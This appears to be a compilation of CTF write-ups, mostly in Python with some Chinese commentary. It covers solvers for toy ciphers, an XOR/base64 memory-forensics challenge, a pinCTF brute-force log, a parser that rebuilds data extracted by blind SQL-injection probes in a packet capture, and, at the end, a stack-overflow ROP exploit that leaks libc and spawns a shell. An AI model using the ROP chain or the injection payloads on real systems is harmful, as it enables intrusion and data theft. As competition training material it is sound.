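# Pairwise-sum "decoder": every 4-hex-digit group holds two bytes whose sum is
# one output character.  There is no key involved, so this is obfuscation, not
# encryption -- anyone holding the blob recovers the text.
a = '52112013243f2a0f280b22131e181f19412322101b192113260c0c29540d191e2b380d2b1f112017273c134f51121f133034191f191a560d10250b2521162312'
# int(x, 16) already accepts an optional "0x" prefix, so prepending one (as the
# original did) was redundant; a str.join avoids repeated string concatenation.
b = ''.join(chr(int(a[i:i + 2], 16) + int(a[i + 2:i + 4], 16)) for i in range(0, len(a), 4))
print(b)  # parenthesised form prints identically on Python 2 and 3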
import sys
from secret_file import *


def _l(idx, s):
    """Return *s* rotated left by *idx* positions (``s[idx:] + s[:idx]``)."""
    tail, head = s[idx:], s[:idx]
    return tail + head


def main(p, k1, k2):
    """Encrypt *p* under the two repeating keys *k1* and *k2*.

    The alphabet ``s`` holds 65 symbols (A-Z, 0-9, a-z, ``_``, ``{``, ``}``).
    The table-based form of this routine builds ``t[i][j]`` as the alphabet
    rotated by ``(i + j) % 65`` and reads ``t[i][j][k]``; that entry is exactly
    ``s[(i + j + k) % 65]``, which is what is computed here.  The consequence
    is that the "two keys" collapse into a single additive key stream, so the
    scheme is a Vigenere variant with an effective key length of
    lcm(len(k1), len(k2)) and is breakable from a short known plaintext.
    Symbols absent from ``s`` get index -1 from ``str.find`` and are mapped
    through the same modular shift, matching the table lookup.

    Args:
        p: plaintext string.
        k1, k2: non-empty key strings, cycled independently.

    Returns:
        Ciphertext string over ``s`` of the same length as *p*.
    """
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    n = len(s)
    out = []
    pos1 = pos2 = 0
    for ch in p:
        shift = s.find(ch) + s.find(k1[pos1]) + s.find(k2[pos2])
        out.append(s[shift % n])
        pos1 = (pos1 + 1) % len(k1)
        pos2 = (pos2 + 1) % len(k2)
    return "".join(out)
# 65-symbol alphabet shared by the cipher helpers: A-Z, 0-9, a-z, "_", "{", "}".
s = (
    "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
    "0123456789"
    "abcdefghijklmnopqrstuvwxyz"
    "_{}"
)
def _l(idx, s):
    """Return *s* rotated left by *idx* positions.

    Plain slice semantics apply: an *idx* at or past ``len(s)`` yields *s*
    unchanged, a negative *idx* rotates right by that amount.
    """
    tail = s[idx:]
    head = s[:idx]
    return tail + head
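def decrypt(ct, k1, k2):
    """Invert the table cipher: recover the plaintext of *ct* under *k1*, *k2*.

    The encryption table entry ``t[i][j][k]`` (alphabet rotated by
    ``(i + j) % 65``, then indexed by ``k``) equals ``s[(i + j + k) % 65]``.
    For fixed key indices ``j, k`` that map is a bijection on the alphabet, so
    each ciphertext symbol has exactly one preimage,
    ``s[(idx(ct) - j - k) % 65]``, and the per-character scan over all 65
    candidates is unnecessary.

    Args:
        ct: ciphertext string.
        k1, k2: non-empty key strings, cycled independently.

    Returns:
        The decrypted string.  Ciphertext symbols outside ``s`` have no
        preimage and are dropped, while the key positions still advance.
    """
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    n = len(s)
    i1 = i2 = 0
    out = []
    for a in ct:
        ai = s.find(a)
        if ai != -1:
            out.append(s[(ai - s.find(k1[i1]) - s.find(k2[i2])) % n])
        i1 = (i1 + 1) % len(k1)
        i2 = (i2 + 1) % len(k2)
    return "".join(out)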
def get_key(plain, cipher, key_len):
    """Recover key symbols from a known plaintext/ciphertext pair.

    This is the demonstration of why the table cipher is weak: because
    ``t[i][j][k] == s[(i + j + k) % 65]``, one known (plaintext, ciphertext)
    pair pins down ``j + k`` at every position.  The search mirrors the
    original scan exactly, including its challenge-specific assumptions:
    only the first five alphabet symbols (``A``..``E``) are tried for the
    second key, the second key symbol is stored mirrored at
    ``key[key_len - 1 - i]``, and when several (j, k) pairs match, the last
    one in scan order (largest j) wins.

    Args:
        plain: known plaintext; a position at or beyond *key_len* raises
            ``IndexError`` as soon as it matches.
        cipher: ciphertext aligned with *plain* (at least as long).
        key_len: number of key slots; slots never written stay ``'*'``.

    Returns:
        The recovered key symbols joined into one string.
    """
    s = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz_{}"
    n = len(s)
    slots = ['*'] * key_len
    for pos in range(len(plain)):
        p_idx = s.find(plain[pos])
        for j in range(n):
            for k in range(5):
                if s[(p_idx + j + k) % n] == cipher[pos]:
                    slots[pos] = s[j]
                    slots[key_len - 1 - pos] = s[k]
    return ''.join(slots)
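# Pull the blind-SQLi probes out of the capture: for each request, the injected
# predicate after "and", and for each response, the Content-Length line (332 vs
# 366 is what separates the false/true branches in this traffic).  Both handles
# are closed by the context manager; the original never closed the capture file.
# Written with Python 2 str semantics (str regexes over lines read from an 'rb'
# handle) -- TODO confirm interpreter before porting.
# Detection note: the /**/-padded predicates and the two fixed response sizes
# are exactly the artefacts a WAF/IDS rule can key on.
with open('8.pcapng', 'rb') as f, open('res.txt', 'wb') as res:
    for line in f:
        hit = re.findall(r'/\?id=1\'/\*\*/and/\*\*/(.*) HTTP/1.1', line)
        if hit:
            res.write(hit[0] + '|')
        if 'Content-Length: 332' in line or 'Content-Length: 366' in line:
            res.write(line)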
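# Rebuild the exfiltrated value from the recorded probes.  Each line of res.txt
# has the shape
#   ascii(substring((select/**/keyid/**/from/**/flag/**/limit/**/0,1),1,1))%3C79%23|Content-Length: 332
# i.e. "is character <pos> < <bound>?", with the response length telling which
# branch the server took (332 = false, 366 = true).  [lo, hi) is narrowed until
# it has width 1, at which point lo is the character.
# Python 2 str semantics assumed (str regex over an 'rb' handle) -- TODO confirm.
flag = ''
check = [32, 126]  # [lo, hi): current bracket for the character being probed
with open('res.txt', 'rb') as res:
    for line in res:
        found = re.findall(r',(\d{,2}),1\)\)%3C(\d{,3})%23\|Content-Length: (\d{3})', line)
        if not found:
            # Not a probe/response pair; skip instead of raising IndexError
            # on found[0] as the original did.
            continue
        _pos, bound, length = found[0]
        if length == '332':  # comparison was false: char >= bound
            check[0] = int(bound)
        else:                # comparison was true: char < bound
            check[1] = int(bound)
        print(check)
        if check[1] - check[0] == 1:
            flag += chr(check[0])
            check = [32, 126]
print('[!] ' + flag)  # same output as the Python 2 `print '[!]', flag`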
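#-*- coding:utf-8 -*-
import os
from base64 import b64encode
# flag{ this is not flag, it's just a comment in python source file.I hide some secret with python, I don't think you can found it.

# Challenge generator: read flag.txt, delete it, apply three rounds of
# (single-byte XOR, then base64), write the result beside this script, then
# delete the script itself.
secret_file_name = 'flag.txt'
secret_file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), secret_file_name)
with open(secret_file_path, 'r') as f:
    secret = f.read()
os.remove(secret_file_path)

key = input("Set a value 0x00 < key < 0xff:")
# int(..., 16) accepts both "0x5a" and "5a"; the original sliced off the first
# two characters unconditionally, which silently mangled un-prefixed input.
key = int(key, 16)
if not 0x00 < key < 0xff:
    raise ValueError("key must satisfy 0x00 < key < 0xff, got %#x" % key)


def encrypt(content, key):
    """XOR every character of *content* with *key*, then base64 the UTF-8 bytes.

    The XOR is applied to code points and the result is UTF-8 encoded, so a
    code point >= 0x80 becomes two bytes; a decryptor must decode UTF-8
    before XORing to round-trip.  A single-byte mask from 0x01..0xFE is
    obfuscation rather than encryption: 254 candidates is trivially
    exhaustible.

    Args:
        content: text to transform.
        key: integer XOR mask.

    Returns:
        base64-encoded ``bytes`` of the XORed text.
    """
    xored = ''.join(chr(ord(c) ^ key) for c in content)
    return b64encode(xored.encode('utf-8'))


for i in range(3):
    secret = encrypt(secret, key)
    # b64encode returns bytes; the original tested `type(secret) != 'str'`,
    # which compares a type object to a string and is always true, so the
    # decode always ran -- isinstance states the intent and behaves the same.
    if isinstance(secret, bytes):
        secret = secret.decode('utf-8')

result_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'lalala.secret')
with open(result_path, 'w') as f:
    f.write(secret)
os.remove(os.path.abspath(__file__))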
在\Device\HarddiskVolume1\Documents and Settings\Administrator\桌面找到加密后的文件lalala.secret,内存搜索一大串base64也可以,加密字符串特征比较明显。听说有大神找base64字符串,直接脑补了加密算法,我只能说刚刚NB。
直接爆破key即可
# Ciphertext recovered from the memory image: three rounds of single-byte XOR
# followed by base64, so the outermost layer is base64 text.
m = (
    'c1IufV1PRUZOX1VtTyYiIE9BRXJxeyZS'
    'WyRVc0MmIiJPQS52cU9FUkN6XXVyQlJ7'
    'c1JFQHJBI3xGeWNzcXtnL3QkZyNccCoq=='
)
def decrypt(content, key):
    """Undo one round of the generator's transform: base64-decode, then XOR.

    The decoded bytes are interpreted as UTF-8 before XORing code points,
    mirroring an encryptor that XORs code points and then UTF-8 encodes, so
    the pair round-trips even for code points >= 0x80.

    Args:
        content: base64 text (str or bytes).
        key: integer XOR mask.

    Returns:
        The XORed text as a str.

    Raises:
        binascii.Error / UnicodeDecodeError (both ValueError subclasses)
        when *content* is not valid base64 or not valid UTF-8 after decoding.
    """
    plain = b64decode(content).decode('utf-8')
    return ''.join([chr(ord(ch) ^ key) for ch in plain])
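# Exhaustive key search: the generator's key is a single byte, so every
# candidate can be tried; candidates whose base64/UTF-8 decoding fails are
# skipped.  Only the decode errors are swallowed (binascii.Error and
# UnicodeDecodeError are both ValueError subclasses); the original's bare
# `except: pass` would also have hidden real bugs such as a NameError.
for i in range(0x100):
    try:
        m2 = decrypt(m, i)
        m3 = decrypt(m2, i)
        flag = decrypt(m3, i)
        print(flag)
    except ValueError:
        continue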
for ( i = 1; i < len(flag); ++i ) { flag[i] ^= i; } return flag;
>>> a=[0x0,0x67,0x6e,0x62,0x63,0x7e,0x41,0x4b,0x3b,0x4c,0x7e,0x51,0x5c,0x49,0x62,0x77,0x78,0x62,0x79,0x51,0x79,0x70,0x75,0x2e,0x2e,0x70,0x48,0x66,0x1c] >>> ''.join([chr(a[i]^i) for i in range(len(a))]) '\x00flag{GL3EtZPDlxhskBmec96iR}\x00'
./pinCTF.py -f examples/wyvern_c85f1be480808a9da350faaa6104a19b -i -l obj-intel64/ -sl 28 -r abcdefghijklmnopqrstuvwxyz012345_-+LVMA -sk [+] iter 0 using d for dAAAAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 1 using r for drAAAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 2 using 4 for dr4AAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 3 using g for dr4gAAAAAAAAAAAAAAAAAAAAAAAA [+] iter 4 using 0 for dr4g0AAAAAAAAAAAAAAAAAAAAAAA [+] iter 5 using n for dr4g0nAAAAAAAAAAAAAAAAAAAAAA [+] iter 6 using _ for dr4g0n_AAAAAAAAAAAAAAAAAAAAA [+] iter 7 using o for dr4g0n_oAAAAAAAAAAAAAAAAAAAA [+] iter 8 using r for dr4g0n_orAAAAAAAAAAAAAAAAAAA [+] iter 9 using _ for dr4g0n_or_AAAAAAAAAAAAAAAAAA [+] iter 10 using p for dr4g0n_or_pAAAAAAAAAAAAAAAAA [+] iter 11 using 4 for dr4g0n_or_p4AAAAAAAAAAAAAAAA [+] iter 12 using t for dr4g0n_or_p4tAAAAAAAAAAAAAAA [+] iter 13 using r for dr4g0n_or_p4trAAAAAAAAAAAAAA [+] iter 14 using i for dr4g0n_or_p4triAAAAAAAAAAAAA [+] iter 15 using c for dr4g0n_or_p4tricAAAAAAAAAAAA [+] iter 16 using 1 for dr4g0n_or_p4tric1AAAAAAAAAAA [+] iter 17 using a for dr4g0n_or_p4tric1aAAAAAAAAAA [+] iter 18 using n for dr4g0n_or_p4tric1anAAAAAAAAA [+] iter 19 using _ for dr4g0n_or_p4tric1an_AAAAAAAA [+] iter 20 using i for dr4g0n_or_p4tric1an_iAAAAAAA [+] iter 21 using t for dr4g0n_or_p4tric1an_itAAAAAA [+] iter 22 using 5 for dr4g0n_or_p4tric1an_it5AAAAA [+] iter 23 using _ for dr4g0n_or_p4tric1an_it5_AAAA [+] iter 24 using L for dr4g0n_or_p4tric1an_it5_LAAA [+] iter 25 using L for dr4g0n_or_p4tric1an_it5_LLAA [+] iter 26 using V for dr4g0n_or_p4tric1an_it5_LLVA [+] iter 27 using M for dr4g0n_or_p4tric1an_it5_LLVM [+] Found pattern dr4g0n_or_p4tric1an_it5_LLVM
pwn
pwn不难,没脑洞没坑
pwn 1
栈溢出后ROP即可
pr = 0x0000000000400863# pop rdi ; ret p.sendlineafter('name:','a'*0x78+flat(pr,elf.got['read'],elf.plt['puts'],0x400776)) libc.address = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.sym['read'] success(hex(libc.address)) p.sendlineafter('name:','a'*0x78+p64(libc.address+0x4526a)) p.interactive()